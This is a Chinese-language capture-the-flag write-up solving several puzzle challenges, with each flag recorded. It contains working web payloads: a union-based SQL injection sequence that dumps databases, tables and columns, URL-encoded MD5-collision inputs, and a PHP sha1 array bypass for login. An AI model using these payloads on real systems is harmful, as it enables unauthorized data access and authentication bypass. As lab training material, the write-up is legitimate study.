土肥原贤二

提交1'出现报错,判断字段数以及显示位
1‘order by 1,2,3,4 #
1' union select 1,2,3,4 #

爆库
1' union select 1,2,(select group_concat(schema_name) from information_schema.schemata),4 #
爆表
1' union select 1,2,3,(select group_concat(table_name) from information_schema.tables where table_schema='luozhen') #

爆列
1' union select 1,2,3,(select group_concat(column_name) from information_schema.columns where table_name='flag') #

爆值
1' union select 1,2,3,group_concat(flag) from flag #

得到flag
flag{20_welcome_19 }
吴佩孚
题目地址:
进去后发现是base64加密,利用chrome控制台解密

得到JSfuck,利用在线解密网站进行解密https://www.bugku.com/tools/jsfuck/

flag{sdf465454dfgert32}
日军空袭

Base64加密,最后解密得到
fB__l621a4h4g_ai%7B%26i%7D
url解码后得到
fB__l621a4h4g_ai{&i}
很像打乱的flag,试试栅栏。

得到flag
flag{B64_&_2hai_14i}
戴星炳
题目地址:
计算题,和bugjku上的一道题类似,编写python脚本可以做出来

url = "http://47.103.43.235:82/web/a/index.php"
import requests, re
a = requests.session()
flag = a.get(url).text
b = re.findall(r'</p><p>.*</p>', flag) #正则表达式找到算术式
c = eval(b[0][7:-4]) #计算
d = a.post(url, data={"result": c}) #burp抓包可得知要用result提交
print(d.text)#打印结果
得到flag

flag{Y0U_4R3_3o_F4ST!}
潘汉年

发现密文和flag格式的ASCILL码的差值有一个规律
f->b 4
l->g 5
a->[ 6
g->` 7
{->s 8
.....
}->d 25
都是明文同密文相减,按照如上规律可知

同理得到完整明文
flag{c4es4r_variation}
晴气庆胤
题目地址:
起初觉得是注入,注了半天注不进去,查看源码发现是MD5碰撞

要求构造不同的param1和param2,但是MD5值要相同,百度找了两个MD5值相同的二进制文件,用urlcode构造出payload
param1=
%D89%A4%FD%14%EC%0EL%1A%FEG%ED%5B%D0%C0%7D%CAh%16%B4%DFl%08Z%FA%1DA%05i%29%C4%FF%80%11%14%E8jk5%0DK%DAa%FC%2B%DC%9F%95ab%D2%09P%A1%5D%12%3B%1ETZ%AA%92%16y%29%CC%7DV%3A%FF%B8e%7FK%D6%CD%1D%DF/a%DE%27%29%EF%08%FC%C0%15%D1%1B%14%C1LYy%B2%F9%88%DF%E2%5B%9E%7D%04c%B1%B0%AFj%1E%7Ch%B0%96%A7%E5U%EBn1q%CA%D0%8B%C7%1BSP
¶m2=
%D89%A4%FD%14%EC%0EL%1A%FEG%ED%5B%D0%C0%7D%CAh%164%DFl%08Z%FA%1DA%05i%29%C4%FF%80%11%14%E8jk5%0DK%DAa%FC%2B%5C%A0%95ab%D2%09P%A1%5D%12%3B%1ET%DA%AA%92%16y%29%CC%7DV%3A%FF%B8e%7FK%D6%CD%1D%DF/a%DE%27%29o%08%FC%C0%15%D1%1B%14%C1LYy%B2%F9%88%DF%E2%5B%9E%7D%04c%B1%B0%AFj%9E%7Bh%B0%96%A7%E5U%EBn1q%CA%D0%0B%C7%1BSP

Burp放包得到flag

flag{MD5@_@success}
梅津美治郎
题目地址:
发现没壳,拖进OD查看

随意输入的密码和r0b0RUlez!进行比较,r0b0RUlez!很有可能就是密码,尝试输入发现密码正确但是还要输入一个密码。

用IDA瞅一眼00401547

a1为用户输入密码
a2地址指向内容是u1nnf2lg,以0x02结束,用u1nnf2lg与0x02抑或,得到第二个密码 w3lld0ne

flag{r0b0RUlez!_w3lld0ne}
池步洲

尝试使用万能密码登陆失败,查看源代码

发现一个可疑的地方,进去看看

想要得到flag需要满足条件name != password & sha1(name) == sha1(password)
可以利用sha1()函数漏洞绕过利用burp构造两个字段为数组
name[]=1&password[]=2

放包,得到flag

flag{Y0u_just_br0ke_sha1}
网友评论